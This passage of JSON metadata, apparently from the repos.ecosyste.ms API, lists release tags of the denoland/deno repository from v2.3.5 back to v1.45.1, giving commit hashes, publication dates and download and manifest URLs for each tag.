%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kin